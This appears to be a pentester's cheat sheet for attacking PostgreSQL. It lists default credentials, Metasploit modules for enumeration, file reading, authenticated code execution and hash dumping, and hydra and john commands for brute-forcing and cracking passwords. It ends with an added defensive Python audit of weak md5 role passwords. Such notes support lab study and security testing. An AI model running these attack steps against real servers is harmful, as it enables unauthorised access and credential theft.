Postgres Jutsus
1. Default Creds and Port
Default credentials: postgres/postgres. Default port is 5432.
2. Default Databases
Most Postgres servers have three databases defined by default: template0, template1 and postgres.
3. Login to postgres by using psql
psql -U postgres # Open psql console with user
psql -h 192.168.232.48 -U postgres -d template1 # Remote connection
psql -h 192.168.232.48 -p 5437 -U postgres -W -d template1 # Different port; -W only forces the password prompt and takes no argument
4. Enumeration
msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
5. Read Files
msf> use auxiliary/admin/postgres/postgres_readfile
6. PostgreSQL 9.3-11.7 - Remote Code Execution Authenticated
This manual exploit works too: https://www.exploit-db.com/exploits/50847
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload
7. Hash Dump
Won't be useful if it's just the postgres user.
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
8. Password Cracking
use scanner/postgres/postgres_login
hydra -l postgres -P passwords.txt postgres://192.168.232.47 -I -s 5437 # Did not work
john --wordlist=trypass.txt --format=raw-md5 amanda.txt
Haven't been able to get hydra, ncrack, or medusa to work on postgres. Use scanner/postgres/postgres_login for brute-force.
You'll have to take rockyou.txt and append the username at the end of each password. Then crack the regular MD5.
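The username has to be appended because PostgreSQL's legacy md5 scheme stores "md5" followed by md5(password + username), so the role name is the only salt. The audit below is an added example, not code from the original page: it takes rows shaped like (rolname, rolpassword) and flags roles still on md5, including any whose hash matches a short denylist such as the default postgres/postgres. The sample rows, the denylist and the function names are all constructed for illustration.

```python
import hashlib
import hmac
import re

MD5_RE = re.compile(r"md5[0-9a-f]{32}")

def pg_md5(password, username):
    """Legacy PostgreSQL verifier: 'md5' + md5(password || username)."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()

def classify(stored):
    """Identify the storage scheme of a rolpassword value."""
    if not stored:
        return "none"
    if stored.startswith("SCRAM-SHA-256$"):
        return "scram-sha-256"
    if MD5_RE.fullmatch(stored):
        return "md5"
    return "unknown"

def audit(rows, denylist):
    """Return (role, finding) for every role that still uses an md5 verifier."""
    findings = []
    for role, stored in rows:
        if classify(stored) != "md5":
            continue
        # The role name itself is also tried, since username == password is common.
        candidates = set(denylist) | {role}
        weak = any(hmac.compare_digest(pg_md5(p, role), stored) for p in candidates)
        findings.append((role, "weak-password" if weak else "legacy-md5"))
    return findings

# Constructed sample data, shaped like SELECT rolname, rolpassword FROM pg_authid.
SAMPLE_ROLES = [
    ("postgres", pg_md5("postgres", "postgres")),
    ("amanda", pg_md5("S0me-l0ng-passphrase!", "amanda")),
    ("app", "SCRAM-SHA-256$4096:c2FsdA==$c3RvcmVk:c2VydmVy"),  # placeholder verifier
    ("nologin", None),
]
DENYLIST = ["postgres", "password", "admin"]  # hypothetical short denylist

if __name__ == "__main__":
    for role, finding in audit(SAMPLE_ROLES, DENYLIST):
        print(f"{role}: {finding}")
```

Roles reported here can be moved off md5 by setting password_encryption = scram-sha-256 and then resetting their passwords.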